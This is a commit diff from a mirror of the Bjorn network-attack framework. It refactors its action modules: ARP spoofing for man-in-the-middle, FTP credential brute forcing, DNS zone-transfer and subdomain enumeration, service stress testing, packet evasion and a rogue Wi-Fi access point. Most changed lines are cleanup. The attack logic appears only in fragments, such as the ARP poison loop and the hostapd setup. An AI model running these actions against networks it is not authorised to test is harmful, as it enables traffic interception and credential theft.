mirror of
https://github.com/infinition/Bjorn.git
synced 2026-03-19 18:20:24 +00:00
feat: Add login page with dynamic RGB effects and password toggle functionality
feat: Implement package management utilities with JSON endpoints for listing and uninstalling packages feat: Create plugin management utilities with endpoints for listing, configuring, and installing plugins feat: Develop schedule and trigger management utilities with CRUD operations for schedules and triggers
This commit is contained in:
@@ -1,14 +1,34 @@
|
||||
"""IDLE.py - No-op placeholder action for idle state."""
|
||||
|
||||
from shared import SharedData
|
||||
|
||||
b_class = "IDLE"
|
||||
b_module = "idle"
|
||||
b_status = "IDLE"
|
||||
b_class = "IDLE"
|
||||
b_module = "idle"
|
||||
b_status = "IDLE"
|
||||
b_enabled = 0
|
||||
b_action = "normal"
|
||||
b_trigger = None
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_priority = 0
|
||||
b_timeout = 60
|
||||
b_cooldown = 0
|
||||
b_name = "IDLE"
|
||||
b_description = "No-op placeholder action representing idle state."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_max_retries = 0
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["idle", "placeholder"]
|
||||
b_category = "system"
|
||||
b_icon = "IDLE.png"
|
||||
|
||||
|
||||
class IDLE:
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
|
||||
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
"""No-op action. Always returns success."""
|
||||
return "success"
|
||||
|
||||
@@ -1,15 +1,6 @@
|
||||
"""
|
||||
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
|
||||
"""arp_spoofer.py - Bidirectional ARP cache poisoning for MITM positioning.
|
||||
|
||||
Ethical cybersecurity lab action for Bjorn framework.
|
||||
Performs bidirectional ARP spoofing between a target host and the network
|
||||
gateway. Restores ARP tables on completion or interruption.
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port, row) for the target host.
|
||||
- Gateway IP is auto-detected from system routing table or shared config.
|
||||
- Results persisted to JSON output and logged for RL training.
|
||||
- Fully integrated with EPD display (progress, status, comments).
|
||||
Spoofs target<->gateway ARP entries; auto-restores tables on exit.
|
||||
"""
|
||||
|
||||
import os
|
||||
@@ -104,7 +95,7 @@ class ARPSpoof:
|
||||
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
|
||||
self._scapy_ok = True
|
||||
except ImportError:
|
||||
logger.error("scapy not available — ARPSpoof will not function")
|
||||
logger.error("scapy not available - ARPSpoof will not function")
|
||||
self._scapy_ok = False
|
||||
|
||||
# ─────────────────── Identity Cache ──────────────────────
|
||||
@@ -231,7 +222,7 @@ class ARPSpoof:
|
||||
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
|
||||
return "failed"
|
||||
if gateway_ip == ip:
|
||||
logger.warning(f"Target {ip} IS the gateway — skipping")
|
||||
logger.warning(f"Target {ip} IS the gateway - skipping")
|
||||
return "failed"
|
||||
|
||||
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
|
||||
@@ -252,7 +243,7 @@ class ARPSpoof:
|
||||
return "failed"
|
||||
|
||||
self.shared_data.bjorn_progress = "20%"
|
||||
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
|
||||
logger.info(f"Resolved - target_mac={target_mac}, gateway_mac={gateway_mac}")
|
||||
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
|
||||
|
||||
# 3) Spoofing loop
|
||||
@@ -263,7 +254,7 @@ class ARPSpoof:
|
||||
|
||||
while (time.time() - start_time) < duration:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit — stopping ARP spoof")
|
||||
logger.info("Orchestrator exit - stopping ARP spoof")
|
||||
break
|
||||
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
|
||||
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
|
||||
|
||||
@@ -1,19 +1,8 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
|
||||
"""berserker_force.py - Rate-limited service stress testing with degradation analysis.
|
||||
|
||||
What it does:
|
||||
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
|
||||
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
|
||||
(scapy), HTTP probes (urllib), or mixed mode.
|
||||
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
|
||||
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
|
||||
|
||||
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
|
||||
target's response times change under light load. Max 50 req/s to stay RPi-safe.
|
||||
|
||||
Output is saved to data/output/stress/<ip>_<timestamp>.json
|
||||
Measures baseline response times, applies light load (max 50 req/s), then reports per-port degradation.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -115,8 +104,8 @@ b_examples = [
|
||||
b_docs_url = "docs/actions/BerserkerForce.md"
|
||||
|
||||
# -------------------- Constants -----------------------------------------------
|
||||
_DATA_DIR = "/home/bjorn/Bjorn/data"
|
||||
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
|
||||
_DATA_DIR = None # Resolved at runtime via shared_data.data_dir
|
||||
OUTPUT_DIR = None # Resolved at runtime via shared_data.data_dir
|
||||
|
||||
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
|
||||
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
|
||||
@@ -428,15 +417,16 @@ class BerserkerForce:
|
||||
|
||||
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
|
||||
"""Write the JSON report and return the file path."""
|
||||
output_dir = os.path.join(self.shared_data.data_dir, "output", "stress")
|
||||
try:
|
||||
os.makedirs(OUTPUT_DIR, exist_ok=True)
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
except Exception as exc:
|
||||
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
|
||||
logger.warning(f"Could not create output dir {output_dir}: {exc}")
|
||||
|
||||
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
|
||||
safe_ip = ip.replace(":", "_").replace(".", "_")
|
||||
filename = f"{safe_ip}_{ts}.json"
|
||||
filepath = os.path.join(OUTPUT_DIR, filename)
|
||||
filepath = os.path.join(output_dir, filename)
|
||||
|
||||
report = {
|
||||
"tool": "berserker_force",
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
"""bruteforce_common.py - Shared helpers for all bruteforce actions (progress tracking, password generation)."""
|
||||
|
||||
import itertools
|
||||
import threading
|
||||
import time
|
||||
|
||||
0
actions/custom/__init__.py
Normal file
0
actions/custom/__init__.py
Normal file
105
actions/custom/example_bjorn_action.py
Normal file
105
actions/custom/example_bjorn_action.py
Normal file
@@ -0,0 +1,105 @@
|
||||
"""example_bjorn_action.py - Custom action template using the Bjorn action format."""
|
||||
|
||||
import time
|
||||
import logging
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="example_bjorn_action", level=logging.DEBUG)
|
||||
|
||||
# ---- Bjorn action metadata (required for Bjorn format detection) ----
|
||||
b_class = "ExampleBjornAction"
|
||||
b_module = "custom/example_bjorn_action"
|
||||
b_name = "Example Bjorn Action"
|
||||
b_description = "Demo custom action with shared_data access and DB queries."
|
||||
b_author = "Bjorn Community"
|
||||
b_version = "1.0.0"
|
||||
b_action = "custom"
|
||||
b_enabled = 1
|
||||
b_priority = 50
|
||||
b_port = None
|
||||
b_service = None
|
||||
b_trigger = None
|
||||
b_parent = None
|
||||
b_cooldown = 0
|
||||
b_rate_limit = None
|
||||
b_tags = '["custom", "example", "template"]'
|
||||
|
||||
# ---- Argument schema (drives the web UI controls) ----
|
||||
b_args = {
|
||||
"target_ip": {
|
||||
"type": "text",
|
||||
"default": "192.168.1.1",
|
||||
"description": "Target IP address to probe"
|
||||
},
|
||||
"scan_count": {
|
||||
"type": "number",
|
||||
"default": 3,
|
||||
"min": 1,
|
||||
"max": 100,
|
||||
"description": "Number of probe iterations"
|
||||
},
|
||||
"verbose": {
|
||||
"type": "checkbox",
|
||||
"default": False,
|
||||
"description": "Enable verbose output"
|
||||
},
|
||||
"mode": {
|
||||
"type": "select",
|
||||
"choices": ["quick", "normal", "deep"],
|
||||
"default": "normal",
|
||||
"description": "Scan depth"
|
||||
}
|
||||
}
|
||||
|
||||
b_examples = [
|
||||
{"name": "Quick local scan", "args": {"target_ip": "192.168.1.1", "scan_count": 1, "mode": "quick"}},
|
||||
{"name": "Deep scan", "args": {"target_ip": "10.0.0.1", "scan_count": 10, "mode": "deep", "verbose": True}},
|
||||
]
|
||||
|
||||
|
||||
class ExampleBjornAction:
|
||||
"""Custom Bjorn action with full shared_data access."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
logger.info("ExampleBjornAction initialized")
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Main entry point called by action_runner / orchestrator.
|
||||
|
||||
Args:
|
||||
ip: Target IP address
|
||||
port: Target port (may be empty)
|
||||
row: Dict with MAC Address, IPs, Ports, Alive
|
||||
status_key: Action class name (for status tracking)
|
||||
|
||||
Returns:
|
||||
'success' or 'failed'
|
||||
"""
|
||||
verbose = getattr(self.shared_data, "verbose", False)
|
||||
scan_count = int(getattr(self.shared_data, "scan_count", 3))
|
||||
mode = getattr(self.shared_data, "mode", "normal")
|
||||
|
||||
print(f"[*] Running ExampleBjornAction on {ip} (mode={mode}, count={scan_count})")
|
||||
|
||||
# Example: query DB for known hosts
|
||||
try:
|
||||
host_count = self.shared_data.db.query_one(
|
||||
"SELECT COUNT(1) c FROM hosts"
|
||||
)
|
||||
print(f"[*] Known hosts in DB: {host_count['c'] if host_count else 0}")
|
||||
except Exception as e:
|
||||
print(f"[!] DB query failed: {e}")
|
||||
|
||||
# Simulate work
|
||||
for i in range(scan_count):
|
||||
if getattr(self.shared_data, "orchestrator_should_exit", False):
|
||||
print("[!] Stop requested, aborting")
|
||||
return "failed"
|
||||
print(f"[*] Probe {i+1}/{scan_count} on {ip}...")
|
||||
if verbose:
|
||||
print(f" MAC={row.get('MAC Address', 'unknown')} mode={mode}")
|
||||
time.sleep(1)
|
||||
|
||||
print(f"[+] Done. {scan_count} probes completed on {ip}")
|
||||
return "success"
|
||||
97
actions/custom/example_free_script.py
Normal file
97
actions/custom/example_free_script.py
Normal file
@@ -0,0 +1,97 @@
|
||||
"""example_free_script.py - Custom script template using plain Python (no shared_data)."""
|
||||
|
||||
import argparse
|
||||
import time
|
||||
import sys
|
||||
|
||||
# ---- Display metadata (optional, used by the web UI) ----
|
||||
b_name = "Example Free Script"
|
||||
b_description = "Standalone Python script demo with argparse and progress output."
|
||||
b_author = "Bjorn Community"
|
||||
b_version = "1.0.0"
|
||||
b_tags = '["custom", "example", "template", "free"]'
|
||||
|
||||
# ---- Argument schema (drives the web UI controls, same format as Bjorn actions) ----
|
||||
b_args = {
|
||||
"target": {
|
||||
"type": "text",
|
||||
"default": "192.168.1.0/24",
|
||||
"description": "Target host or CIDR range"
|
||||
},
|
||||
"timeout": {
|
||||
"type": "number",
|
||||
"default": 5,
|
||||
"min": 1,
|
||||
"max": 60,
|
||||
"description": "Timeout per probe in seconds"
|
||||
},
|
||||
"output_format": {
|
||||
"type": "select",
|
||||
"choices": ["text", "json", "csv"],
|
||||
"default": "text",
|
||||
"description": "Output format"
|
||||
},
|
||||
"dry_run": {
|
||||
"type": "checkbox",
|
||||
"default": False,
|
||||
"description": "Simulate without actually probing"
|
||||
}
|
||||
}
|
||||
|
||||
b_examples = [
|
||||
{"name": "Quick local check", "args": {"target": "192.168.1.1", "timeout": 2, "output_format": "text"}},
|
||||
{"name": "Dry run JSON", "args": {"target": "10.0.0.0/24", "timeout": 5, "output_format": "json", "dry_run": True}},
|
||||
]
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Example free-form Bjorn custom script")
|
||||
parser.add_argument("--target", default="192.168.1.0/24", help="Target host or CIDR")
|
||||
parser.add_argument("--timeout", type=int, default=5, help="Timeout per probe (seconds)")
|
||||
parser.add_argument("--output-format", default="text", choices=["text", "json", "csv"])
|
||||
parser.add_argument("--dry-run", action="store_true", help="Simulate without probing")
|
||||
args = parser.parse_args()
|
||||
|
||||
print(f"[*] Example Free Script starting")
|
||||
print(f"[*] Target: {args.target}")
|
||||
print(f"[*] Timeout: {args.timeout}s")
|
||||
print(f"[*] Format: {args.output_format}")
|
||||
print(f"[*] Dry run: {args.dry_run}")
|
||||
print()
|
||||
|
||||
# Simulate some work with progress output
|
||||
steps = 5
|
||||
for i in range(steps):
|
||||
print(f"[*] Step {i+1}/{steps}: {'simulating' if args.dry_run else 'probing'} {args.target}...")
|
||||
time.sleep(1)
|
||||
|
||||
# Example output in different formats
|
||||
results = [
|
||||
{"host": "192.168.1.1", "status": "up", "latency": "2ms"},
|
||||
{"host": "192.168.1.100", "status": "up", "latency": "5ms"},
|
||||
]
|
||||
|
||||
if args.output_format == "json":
|
||||
import json
|
||||
print(json.dumps(results, indent=2))
|
||||
elif args.output_format == "csv":
|
||||
print("host,status,latency")
|
||||
for r in results:
|
||||
print(f"{r['host']},{r['status']},{r['latency']}")
|
||||
else:
|
||||
for r in results:
|
||||
print(f" {r['host']} {r['status']} ({r['latency']})")
|
||||
|
||||
print()
|
||||
print(f"[+] Done. Found {len(results)} hosts.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
main()
|
||||
except KeyboardInterrupt:
|
||||
print("\n[!] Interrupted")
|
||||
sys.exit(130)
|
||||
except Exception as e:
|
||||
print(f"\n[!] Error: {e}")
|
||||
sys.exit(1)
|
||||
@@ -1,9 +1,5 @@
|
||||
# demo_action.py
|
||||
# Demonstration Action: wrapped in a DemoAction class
|
||||
"""demo_action.py - Minimal template action that prints its arguments."""
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Metadata (compatible with sync_actions / Neo launcher)
|
||||
# ---------------------------------------------------------------------------
|
||||
b_class = "DemoAction"
|
||||
b_module = "demo_action"
|
||||
b_enabled = 1
|
||||
@@ -14,6 +10,19 @@ b_description = "Demonstration action: simply prints the received arguments."
|
||||
b_author = "Template"
|
||||
b_version = "0.1.0"
|
||||
b_icon = "demo_action.png"
|
||||
b_status = "demo_action"
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_trigger = None
|
||||
b_parent = None
|
||||
b_priority = 0
|
||||
b_cooldown = 0
|
||||
b_rate_limit = None
|
||||
b_timeout = 60
|
||||
b_max_retries = 0
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["demo", "template", "test"]
|
||||
|
||||
b_examples = [
|
||||
{
|
||||
@@ -129,6 +138,8 @@ def _list_net_ifaces() -> list[str]:
|
||||
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
|
||||
except Exception:
|
||||
pass
|
||||
if os.name == "nt":
|
||||
return ["Ethernet", "Wi-Fi"]
|
||||
try:
|
||||
for n in os.listdir("/sys/class/net"):
|
||||
if n and n != "lo":
|
||||
@@ -183,7 +194,8 @@ class DemoAction:
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
"""Called by the orchestrator. This demo only prints arguments."""
|
||||
self.shared_data.bjorn_orch_status = "DemoAction"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"status": "running"}
|
||||
|
||||
print("=== DemoAction :: executed ===")
|
||||
print(f" IP/Target: {ip}:{port}")
|
||||
|
||||
@@ -1,19 +1,4 @@
|
||||
"""
|
||||
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
|
||||
|
||||
Performs comprehensive DNS intelligence gathering on discovered hosts:
|
||||
- Reverse DNS lookup on target IP
|
||||
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
|
||||
- Zone transfer (AXFR) attempts against discovered nameservers
|
||||
- Subdomain brute-force enumeration with threading
|
||||
|
||||
SQL mode:
|
||||
- Targets provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Discovered hostnames are written back to DB hosts table
|
||||
- Results saved as JSON in data/output/dns/
|
||||
- Action status recorded in DB.action_results (via DNSPillager.execute)
|
||||
"""
|
||||
"""dns_pillager.py - DNS recon: reverse lookups, record enumeration, zone transfers, subdomain brute."""
|
||||
|
||||
import os
|
||||
import json
|
||||
@@ -29,7 +14,6 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -46,14 +46,14 @@ b_icon = "FreyaHarvest.png"
|
||||
|
||||
b_args = {
|
||||
"input_dir": {
|
||||
"type": "text",
|
||||
"label": "Input Data Dir",
|
||||
"default": "/home/bjorn/Bjorn/data/output"
|
||||
"type": "text",
|
||||
"label": "Input Data Dir",
|
||||
"default": "data/output"
|
||||
},
|
||||
"output_dir": {
|
||||
"type": "text",
|
||||
"label": "Reports Dir",
|
||||
"default": "/home/bjorn/Bjorn/data/reports"
|
||||
"type": "text",
|
||||
"label": "Reports Dir",
|
||||
"default": "data/reports"
|
||||
},
|
||||
"watch": {
|
||||
"type": "checkbox",
|
||||
@@ -92,7 +92,8 @@ class FreyaHarvest:
|
||||
with self.lock:
|
||||
self.data[cat].append(finds)
|
||||
new_findings += 1
|
||||
except: pass
|
||||
except Exception:
|
||||
logger.debug(f"Failed to read {f_path}")
|
||||
|
||||
if new_findings > 0:
|
||||
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
|
||||
@@ -123,20 +124,30 @@ class FreyaHarvest:
|
||||
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
|
||||
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
|
||||
# Reset per-run state to prevent memory accumulation
|
||||
self.data.clear()
|
||||
self.last_scan_time = 0
|
||||
|
||||
_data_dir = getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data")
|
||||
_default_input = os.path.join(_data_dir, "output")
|
||||
_default_output = os.path.join(_data_dir, "reports")
|
||||
input_dir = getattr(self.shared_data, "freya_harvest_input", _default_input)
|
||||
output_dir = getattr(self.shared_data, "freya_harvest_output", _default_output)
|
||||
watch = getattr(self.shared_data, "freya_harvest_watch", True)
|
||||
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
|
||||
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
|
||||
|
||||
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
|
||||
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": "0"}
|
||||
|
||||
start_time = time.time()
|
||||
try:
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
logger.info("FreyaHarvest: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
self._collect_data(input_dir)
|
||||
self._generate_report(output_dir, fmt)
|
||||
@@ -145,7 +156,10 @@ class FreyaHarvest:
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
|
||||
# EPD live status update
|
||||
total_items = sum(len(v) for v in self.data.values())
|
||||
self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": str(total_items)}
|
||||
|
||||
if not watch:
|
||||
break
|
||||
|
||||
@@ -156,7 +170,10 @@ class FreyaHarvest:
|
||||
except Exception as e:
|
||||
logger.error(f"FreyaHarvest error: {e}")
|
||||
return "failed"
|
||||
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
"""
|
||||
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='ftp')
|
||||
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
|
||||
"""
|
||||
“””ftp_bruteforce.py - Threaded FTP credential bruteforcer, results stored in DB.”””
|
||||
|
||||
import os
|
||||
import threading
|
||||
@@ -28,11 +22,24 @@ b_parent = None
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "ftp", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "FTP Bruteforce"
|
||||
b_description = "Threaded FTP credential bruteforcer with share enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "FTPBruteforce.png"
|
||||
|
||||
class FTPBruteforce:
|
||||
"""Wrapper orchestrateur -> FTPConnector."""
|
||||
"""Orchestrator wrapper for FTPConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -40,11 +47,11 @@ class FTPBruteforce:
|
||||
logger.info("FTPConnector initialized.")
|
||||
|
||||
def bruteforce_ftp(self, ip, port):
|
||||
"""Lance le bruteforce FTP pour (ip, port)."""
|
||||
"""Run FTP bruteforce for (ip, port)."""
|
||||
return self.ftp_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "FTPBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
logger.info(f"Brute forcing FTP on {ip}:{port}...")
|
||||
@@ -53,12 +60,11 @@ class FTPBruteforce:
|
||||
|
||||
|
||||
class FTPConnector:
|
||||
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles FTP attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +77,7 @@ class FTPConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -186,7 +192,7 @@ class FTPConnector:
|
||||
self.progress.advance(1)
|
||||
self.queue.task_done()
|
||||
|
||||
# Pause configurable entre chaque tentative FTP
|
||||
# Configurable delay between FTP attempts
|
||||
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_ftp)
|
||||
|
||||
@@ -267,7 +273,8 @@ class FTPConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
"""No longer needed with unique DB index; kept for interface compat."""
|
||||
# Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -119,6 +119,14 @@ class HeimdallGuard:
|
||||
return packet
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
if not HAS_SCAPY:
|
||||
logger.error("HeimdallGuard requires scapy but it is not installed.")
|
||||
return "failed"
|
||||
|
||||
# Reset per-run state
|
||||
self.stats = {'packets_processed': 0, 'packets_fragmented': 0, 'timing_adjustments': 0}
|
||||
self.packet_queue.clear()
|
||||
|
||||
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
|
||||
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
|
||||
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
|
||||
@@ -126,6 +134,8 @@ class HeimdallGuard:
|
||||
|
||||
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
|
||||
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "mode": mode, "iface": iface}
|
||||
|
||||
self.active = True
|
||||
start_time = time.time()
|
||||
@@ -133,11 +143,9 @@ class HeimdallGuard:
|
||||
try:
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
|
||||
# In a real scenario, this would be hooking into a packet stream
|
||||
# For this action, we simulate protection state
|
||||
|
||||
logger.info("HeimdallGuard: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
# Progress reporting
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
@@ -158,7 +166,9 @@ class HeimdallGuard:
|
||||
return "failed"
|
||||
finally:
|
||||
self.active = False
|
||||
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -12,6 +12,7 @@ import subprocess
|
||||
import threading
|
||||
import time
|
||||
import re
|
||||
import tempfile
|
||||
import datetime
|
||||
|
||||
from typing import Any, Dict, List, Optional
|
||||
@@ -126,7 +127,7 @@ class LokiDeceiver:
|
||||
'rsn_pairwise=CCMP'
|
||||
])
|
||||
|
||||
h_path = '/tmp/bjorn_hostapd.conf'
|
||||
h_path = os.path.join(tempfile.gettempdir(), 'bjorn_hostapd.conf')
|
||||
with open(h_path, 'w') as f:
|
||||
f.write('\n'.join(h_conf))
|
||||
|
||||
@@ -140,7 +141,7 @@ class LokiDeceiver:
|
||||
'log-queries',
|
||||
'log-dhcp'
|
||||
]
|
||||
d_path = '/tmp/bjorn_dnsmasq.conf'
|
||||
d_path = os.path.join(tempfile.gettempdir(), 'bjorn_dnsmasq.conf')
|
||||
with open(d_path, 'w') as f:
|
||||
f.write('\n'.join(d_conf))
|
||||
|
||||
@@ -170,10 +171,16 @@ class LokiDeceiver:
|
||||
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
|
||||
password = getattr(self.shared_data, "loki_deceiver_password", "")
|
||||
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
|
||||
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "wifi")
|
||||
output_dir = getattr(self.shared_data, "loki_deceiver_output", _fallback_dir)
|
||||
|
||||
# Reset per-run state
|
||||
self.active_clients.clear()
|
||||
|
||||
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
|
||||
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ssid": ssid, "iface": iface, "channel": str(channel)}
|
||||
|
||||
try:
|
||||
self.stop_event.clear()
|
||||
@@ -181,7 +188,8 @@ class LokiDeceiver:
|
||||
h_path, d_path = self._create_configs(iface, ssid, channel, password)
|
||||
|
||||
# Set IP for interface
|
||||
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
|
||||
subprocess.run(['sudo', 'ip', 'addr', 'add', '192.168.1.1/24', 'dev', iface], capture_output=True)
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
|
||||
|
||||
# Start processes
|
||||
# Use DEVNULL to avoid blocking on unread PIPE buffers.
|
||||
@@ -208,8 +216,9 @@ class LokiDeceiver:
|
||||
start_time = time.time()
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
|
||||
logger.info("LokiDeceiver: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
# Check if procs still alive
|
||||
if self.hostapd_proc.poll() is not None:
|
||||
logger.error("LokiDeceiver: hostapd crashed.")
|
||||
@@ -219,7 +228,9 @@ class LokiDeceiver:
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"ssid": ssid, "clients": str(len(self.active_clients)), "uptime": str(elapsed)}
|
||||
|
||||
if elapsed % 60 == 0:
|
||||
